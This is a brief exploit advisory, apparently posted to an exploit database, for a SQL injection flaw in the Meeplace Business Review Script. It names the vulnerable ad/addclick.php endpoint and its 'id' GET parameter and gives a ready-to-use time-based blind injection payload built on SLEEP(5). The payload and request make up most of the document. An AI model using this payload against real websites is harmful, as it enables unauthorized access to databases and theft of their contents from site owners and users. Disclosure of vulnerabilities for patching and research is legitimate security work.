Exploit Title: Meeplace Business Review Script - ‘id’ SQL Injection

Date: 22.03.2019

Dork:

Exploit Author: Ahmet Ümit BAYRAM

Vendor Homepage: http://www.meeplace.com

Demo Site: http://demo.meeplace.com

Version: Lastest

Tested on: Kali Linux

CVE: N/A

—– PoC: SQLi —–

Request: http://localhost/[PATH]/ad/addclick.php?&id=1

Vulnerable Parameter: id (GET)

Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)